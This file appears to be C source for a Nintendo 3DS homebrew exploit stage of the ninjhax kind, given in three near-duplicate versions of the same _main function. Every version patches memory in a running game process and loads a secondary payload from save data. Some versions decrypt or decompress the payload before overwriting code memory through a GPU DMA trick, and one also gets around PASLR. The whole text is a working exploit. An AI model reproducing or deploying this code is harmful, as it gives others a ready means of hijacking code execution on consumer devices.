int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
paintScreen(0x00,0x00,0x00);
// drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//read secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decrypt it
{
Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
blowfishKeyScheduler((u32*)0x14200000);
blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize);
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
svc_signalEvent(((Handle*)0x3480d0)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// //close thread handles
// ret=svc_closeHandle(*((Handle*)0x359938));
// ret=svc_closeHandle(*((Handle*)0x34FEA4));
// ret=svc_closeHandle(*((Handle*)0x356274));
// ret=svc_closeHandle(*((Handle*)0x334730));
// ret=svc_closeHandle(*((Handle*)0x334F64));
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
#ifdef CN_WEST
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
// patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
// patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
// svc_signalEvent(((Handle*)0x3480d0)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
#else
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
// patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
// patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
// svc_signalEvent(((Handle*)0x354ba8)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
#endif
// everything else is common
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
#ifndef QRINSTALLER
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
#else
memcpy((u8*)0x14100000, (u8*)0x14300000, secondaryPayloadSize);
#endif
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
// doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
// in order to bypass paslr we have to search for individual pages to overwrite...
int i, j;
int k = 0;
for(i = 0; i < CN_CODEBIN_SIZE && k < 0xC; i += 0x1000)
{
for(j = 0; j < 0x0000C000; j += 0x1000)
{
if(!memcmp((void*)(CN_RANDCODEBIN_COPY_BASE + i), (void*)(CN_3DSX_LOADADR + j), 0x20))
{
doGspwn((u32*)(0x14100000 + j), (u32*)(CN_RANDCODEBIN_BASE + i), 0x00001000);
svc_sleepThread(10 * 1000 * 1000);
k++;
break;
}
}
}
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
